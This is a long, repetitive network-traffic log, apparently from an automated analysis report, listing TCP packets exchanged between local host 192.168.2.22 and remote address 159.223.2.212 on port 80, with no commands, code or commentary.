          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
